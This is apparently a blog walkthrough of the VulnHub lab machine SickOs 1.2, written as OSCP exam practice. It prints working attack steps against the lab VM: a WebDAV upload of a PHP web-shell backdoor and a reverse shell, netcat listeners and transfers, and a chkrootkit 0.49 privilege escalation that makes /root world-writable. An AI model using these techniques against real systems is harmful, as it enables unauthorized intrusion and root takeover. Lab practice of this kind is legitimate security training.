30 March 2023

Pentesting Fun Stuff

following the cyber security path…

SickOs: 1.2

4 years ago n0w4n

This is another challenge on my OSCP list. You can find it here.

Enumeration

Starting with a port scan.

root@redteam:~/vulnhub/sickos# nmap -n -T4 -sC -sV -oN fullscan -p- 192.168.50.141
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-23 14:16 CEST
Nmap scan report for 192.168.50.141
Host is up (0.00068s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
|   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open  http    lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:26:F2:2B (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.11 seconds

Webserver

On the landing page there is nothing but a picture, which after downloading hasn’t got anything special to it.

root@redteam:~/vulnhub/sickos# curl -v http://192.168.50.141
* Expire in 0 ms for 6 (transfer 0x563610c89dd0)
*   Trying 192.168.50.141...
* TCP_NODELAY set
* Expire in 200 ms for 4 (transfer 0x563610c89dd0)
* Connected to 192.168.50.141 (192.168.50.141) port 80 (#0)
> GET / HTTP/1.1
> Host: 192.168.50.141
> User-Agent: curl/7.64.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< X-Powered-By: PHP/5.3.10-1ubuntu3.21
< Content-type: text/html
< Transfer-Encoding: chunked
< Date: Sun, 23 Jun 2019 12:39:35 GMT
< Server: lighttpd/1.4.28
< 
<html>

<img src="blow.jpg">

</html>

...[LOT OF EMPTY LINES HERE - SO REMOVED]...

<!-- NOTHING IN HERE ///\\\ -->>>>
* Connection #0 to host 192.168.50.141 left intact

Nothing here…
The HTTP header says PHP, so let’s run a directory brute-forcer.

A test folder which appears to be empty. A quick check about the HTTP options reveals that WebDAV is enabled.

root@redteam:~/vulnhub/sickos# curl -I -X OPTIONS http://192.168.50.141/test/
HTTP/1.1 200 OK
DAV: 1,2
MS-Author-Via: DAV
Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
Allow: OPTIONS, GET, HEAD, POST
Content-Length: 0
Date: Sun, 23 Jun 2019 12:47:38 GMT
Server: lighttpd/1.4.28

Let’s try nmap to upload a php reverse shell script.

root@redteam:~/vulnhub/sickos/dav# nmap -p 80 192.168.50.141 --script http-put --script-args http-put.url='/test/shell.php',http-put.file='/root/vulnhub/sickos/dav/shell.php'
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-23 15:02 CEST
Nmap scan report for 192.168.50.141
Host is up (0.00070s latency).

PORT   STATE SERVICE
80/tcp open  http
|_http-put: /test/shell.php was successfully created
MAC Address: 00:0C:29:26:F2:2B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds

The uploading worked, but after running the file from the browser there is no connection on my end. There is something blocking the connection.
A step back and upload a simple PHP backdoor.

root@redteam:~/vulnhub/sickos/dav# echo '<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>' > cmd.php
root@redteam:~/vulnhub/sickos/dav# nmap -p 80 192.168.50.141 --script http-put --script-args http-put.url='/test/cmd.php',http-put.file='/root/vulnhub/sickos/dav/cmd.php'
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-23 15:21 CEST
Nmap scan report for 192.168.50.141
Host is up (0.00040s latency).

PORT   STATE SERVICE
80/tcp open  http
|_http-put: /test/cmd.php was successfully created
MAC Address: 00:0C:29:26:F2:2B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds

Ok…this works. Now to figure out why the reverse shell was not working.

root@redteam:~/vulnhub/sickos/dav# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.50.137] from (UNKNOWN) [192.168.50.141] 39237

After a few tries, it looks like port 443 is allowed to connect to. Now that I know which port allows a connection I change my PHP reverse shell script to connect to port 443 and upload it again the same way as before. Starting a local listener and……

root@redteam:~/vulnhub/sickos/dav# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.50.137] from (UNKNOWN) [192.168.50.141] 39238
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 07:35:16 up  2:22,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Getting a proper TTY.

$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@ubuntu:/$

PRIVILEGE ESCALATION

To look for some EoP vectors I transfer LinEnum.sh from my local machine to the remote machine using Netcat.

www-data@ubuntu:/tmp$ nc -w3 192.168.50.137 443 > linenum.sh

From this scan there is an interesting SUID file: /usr/bin/mtr. This site has some interesting information about MTR.

‘MTR is a network diagnostic tool that combines ‘ping’ and ‘traceroute’ into one program. A security vulnerability in the product allows execution of arbitrary code, and gaining of elevated privileges. It should be noted that MTR’s author does not recommend that the program be executed a setuid root.’

Unfortunately I can’t seem to get this exploit to work. So I turn my attention back to the LinEnum report.

The combination of kernel version and OS version is most likely a recipe for a known Overlay FS kernel exploit. But this is a very easy exploit and because this machine is a few years old, I’m going to look for another way to escalate my privileges. If nothing else comes up, I can always try this one.

### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root  722 Jun 19  2012 /etc/crontab

/etc/cron.daily:
total 72
drwxr-xr-x  2 root root  4096 Apr 12  2016 .
drwxr-xr-x 84 root root  4096 Jun 23 07:13 ..
-rw-r--r--  1 root root   102 Jun 19  2012 .placeholder
-rwxr-xr-x  1 root root 15399 Nov 15  2013 apt
-rwxr-xr-x  1 root root   314 Apr 18  2013 aptitude
-rwxr-xr-x  1 root root   502 Mar 31  2012 bsdmainutils
-rwxr-xr-x  1 root root  2032 Jun  4  2014 chkrootkit
-rwxr-xr-x  1 root root   256 Oct 14  2013 dpkg
-rwxr-xr-x  1 root root   338 Dec 20  2011 lighttpd
-rwxr-xr-x  1 root root   372 Oct  4  2011 logrotate
-rwxr-xr-x  1 root root  1365 Dec 28  2012 man-db
-rwxr-xr-x  1 root root   606 Aug 17  2011 mlocate
-rwxr-xr-x  1 root root   249 Sep 12  2012 passwd
-rwxr-xr-x  1 root root  2417 Jul  1  2011 popularity-contest
-rwxr-xr-x  1 root root  2947 Jun 19  2012 standard

When looking at the cronjobs listed there is a small deviation. All have the same period of creation except for chkrootkit.

www-data@ubuntu:/tmp$ chkrootkit -V
chkrootkit -V
chkrootkit version 0.49
root@redteam:~/vulnhub/sickos/exploit# searchsploit chkrootkit
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                           |  Path
                                                                                                                                                                         | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Chkrootkit - Local Privilege Escalation (Metasploit)                                                                                                                     | exploits/linux/local/38775.rb
Chkrootkit 0.49 - Local Privilege Escalation                                                                                                                             | exploits/linux/local/33899.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

The file /tmp/update will be executed as root, thus effectively rooting your box, if malicious content is placed inside the file.

There are numerous things you can do, but as I only need to get into /root I create a file called update with in it: chmod -R 777 /root.

After waiting some time…

www-data@ubuntu:/tmp$ ls -ld /root
ls -ld /root
drwxrwxrwx 4 root root 4096 Jun 23 08:39 /root
www-data@ubuntu:/root$ cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.

Thanks for giving this try.

@vulnhub: Thanks for hosting this UP!.

Conclusion

This was indeed a nice challenge do warm up for the OSCP exam. There are a few more challenges to undertake before I wanna try out the OSCP exam.
Hopefully they will be as interesting as this one.

 

 

Tags:

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.